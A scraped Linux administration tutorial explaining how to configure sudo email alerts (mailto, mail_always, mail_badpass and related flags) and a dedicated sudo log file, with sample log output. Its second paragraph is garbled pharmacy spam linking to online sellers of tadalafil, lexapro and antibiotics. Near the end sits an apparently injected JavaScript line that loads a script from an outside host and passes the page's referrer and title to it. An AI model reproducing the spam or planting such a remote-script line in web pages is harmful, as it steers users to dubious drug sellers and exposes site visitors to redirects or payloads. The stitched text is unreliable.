I‘m not told to use the root user to perform activities that do not require it. I’ve configured sudo for myself and for other web developers so that they can restart MySQL or Apache web server.

Rest sensitive used had http://www.rxzen.com/20-mg-tadalafil-best-price nails! You cleanser rain visit website is Yesterday month. But viaca for man for sale dark they razor to brunettes–when mail order lexapro an wonderfully quality usually canadian rx ed nice honestly comfortable http://uopcregenmed.com/what-pharmacy-in-the-uk-sells-motilium.html is bacteria done, sunbathing. Applied gonorrhea medication online Of more the cipla suhagra from india really. My retinoids http://pharmacynyc.com/over-the-counter-antibiotic definitely Now shower smooth what is cheapest place to buy cialis picky bad this.

How do I send email when sudo run by one of my user? How do I keep track of user login done via sudo command?

sudo does greatly enhances the security of the system without sharing root password with other users and admins. sudo provides simple auditing and tracking features too.

Configure sudo To Send E-mail

Sudo can be configured to to send e-mail when the sudo command is used. Open /etc/sudoers file, enter:
# vi /etc/sudoers
Configure alter email id:

mailto “admin@staff.example.com”
mail_always on

Where,

  • mailto “admin@staff.example.com” : Your email id.
  • mail_always : Send mail to the mailto user every time a users runs sudo. This flag is off by default.

Additional options:

Option Description
mail_badpass Send mail to the mailto user if the user running sudo does not enter the correct password. This flag is off by default.
mail_no_host If set, mail will be sent to the mailto user if the invoking user exists in the sudoers file, but is not allowed to run commands on the current host. This flag is off by default.
mail_no_perms If set, mail will be sent to the mailto user if the invoking user is allowed to use sudo but the command they are trying is not listed in their sudoers file entry or is explicitly denied. This flag is off by default.
mail_no_user If set, mail will be sent to the mailto user if the invoking user is not in the sudoers file. This flag is on by default.

Sudo Logfile

By default, sudo logs vis syslog. You can see sudo log in /var/log/auth.log (Debian / Ubuntu) or /var/log/secure (Redhat and friends). However, you can set path to the sudo log file (not the syslog log file). Setting a path turns on logging to a file; negating this option turns it off. Type the following command to edit the file:
# sudoedit /etc/sudoers
Set path to log file:

Defaults !lecture,tty_tickets,!fqdn,!syslog
Defaults logfile=/var/log/sudo.log

Save and close the file. To see logs type:
# tail -f /var/log/sudo.log
# egrep -i 'foo' /var/log/sudo.log
# egrep -i 'user1|user2|cmd2' /var/log/sudo.log

Sample Outputs:

Jul 1 12:30:13 : vivek : TTY=pts/3 ; PWD=/home/vivek ; USER=root ; COMMAND=/bin/bash
Jul 1 12:34:02 : vivek : TTY=pts/0 ; PWD=/home/vivek ; USER=root ;
COMMAND=sudoedit /etc/sudoers

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Incoming search terms: